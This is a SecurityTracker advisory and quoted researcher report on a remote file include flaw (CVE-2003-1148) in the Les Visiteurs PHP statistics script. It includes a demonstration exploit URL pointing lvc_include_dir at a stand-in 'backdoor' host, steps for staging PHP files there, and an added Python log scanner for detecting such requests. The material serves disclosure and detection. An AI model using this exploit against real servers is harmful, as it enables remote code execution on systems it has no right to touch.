Les Visiteurs Include File Error Lets Remote Users Execute Arbitrary Commands on the Target Server
SecurityTracker Alert ID: 1008011
SecurityTracker URL: http://securitytracker.com/id?1008011
CVE Reference: CVE-2003-1148
OSVDB Reference: 2717, 3586
Updated: Oct 16 2006
Original Entry Date: Oct 28 2003
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 2.0.1 and prior versions
Description: An include file vulnerability was reported in the Les Visiteurs PHP-based script. A remote user can execute arbitrary PHP code, including operating system commands, on the target system.
It is reported that the 'include/config.inc.php' and 'include/new-visitor.inc.php' files include other files without validating the location of the included files. A remote user can create a specially crafted URL that will cause PHP code at a remote location to be included and executed by the target server.
A demonstration exploit URL is provided:
http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
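A log check for the request pattern described above, as an added example that is not part of the original advisory: it flags access-log requests to the two named include files that carry an lvc_include_dir parameter. The log lines, the /stats/ install path and the assumption that legitimate clients never supply this parameter are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Files the advisory names as performing unvalidated includes.
VULN_FILES = ("include/config.inc.php", "include/new-visitor.inc.php")
PARAM = "lvc_include_dir"  # parameter from the advisory's demonstration URL
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/\d\.\d"')
URL_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)

# Constructed sample lines (common log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2003:10:00:01 +0000] "GET /stats/index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [28/Oct/2003:10:02:13 +0000] "GET /stats/include/config.inc.php?lvc_include_dir=http://backdoor/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [28/Oct/2003:10:02:40 +0000] "GET /stats/include/new-visitor.inc.php?lvc_include_dir=http%3A%2F%2Fbackdoor%2F HTTP/1.0" 200 298',
    '192.0.2.44 - - [28/Oct/2003:10:05:09 +0000] "GET /stats/include/config.inc.php?lvc_include_dir=../other/ HTTP/1.1" 200 0',
    '192.0.2.10 - - [28/Oct/2003:10:06:30 +0000] "GET /stats/include/config.inc.php HTTP/1.0" 200 0',
]

def classify(line):
    """Return None, 'override' or 'remote-include' for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if not unquote(path).lower().endswith(VULN_FILES):
        return None
    # parse_qs percent-decodes once, so encoded values are compared decoded.
    values = parse_qs(query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if any(URL_SCHEME.match(v) for v in values):
        return "remote-include"   # include directory points at a URL
    return "override"             # client set the include directory at all

def scan(lines):
    """Return (client_ip, verdict) for every line that classify() flags."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```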
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target server. The code and commands will run with the privileges of the target web server.
Solution: No vendor solution was available at the time of this entry. [Editor's note: The report indicates that the software is no longer maintained by the vendor.]
An unofficial patch is available at:
http://chezwam.net/main/publications/lesvisiteurs/
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Matthieu Peschaud <bugtrack@chezwam.net>
Message History:
None.
Source Message Contents
Date: 26 Oct 2003 01:45:52 -0000
From: Matthieu Peschaud <bugtrack@chezwam.net>
Subject: Les Visiteurs v2.0.1 code injection vulnerability
Les Visiteurs is a great statistics script written in PHP.
It gives you some graphical information on visitors of
your website.
This script was distributed by phpinfo.net but has not been
maintained for a year.
---------
In this version several unprotected includes can be found
in files:
- include/config.inc.php
- include/new-visitor.inc.php
It is possible to include a php file from a backdoor server,
and execute it on the target's server.
You just have to create on the backdoor srv these files:
- lang/<lang>.inc.php
- db/db_mysql.inc.php
fill one with something like:
<?
echo '<?
echo "<br><br>included from backdoor server :p<br>";
?>';
?>
and call a URL such as:
http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
---------
Because the script is not maintained and will not be patched,
I have made some tarballs with a patched version.
You will find them at this URL:
http://chezwam.net/main/publications/lesvisiteurs/
Matthieu Peschaud
Epita - France